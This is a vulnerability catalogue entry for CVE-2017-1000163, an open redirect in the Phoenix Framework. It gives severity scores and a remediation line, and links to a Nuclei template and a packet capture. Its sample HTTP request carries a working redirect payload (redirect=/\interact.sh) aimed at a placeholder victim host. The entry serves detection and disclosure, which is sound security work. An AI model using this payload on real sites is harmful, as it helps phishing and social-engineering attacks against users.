| Title | Phoenix Framework - Open Redirect |
|---|---|
| Author | 0x_Akoko |
| Severity | Medium |
| Impact | An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks. |
| Remediation | Apply the latest security patches or upgrade to a patched version of the Phoenix Framework. |
| CVSS Score | 6.1 |
| EPSS Score | 0.00827 |
| CVE ID | CVE-2017-1000163 |
| CWE ID | CWE-601 |
| Tags | cve cve2017 redirect phoenix phoenixframework vuln |
Phoenix Framework versions 1.0.0 through 1.0.4, 1.1.0 through 1.1.6, 1.2.0, 1.2.2 and 1.3.0-rc.0 contain an open redirect vulnerability, which may result in phishing or social engineering attacks.
GET /?redirect=/\interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-1000163.yaml
🦈 Packet Capture: ⬇️ Download cve-2017-1000163.pcap
N/AN/A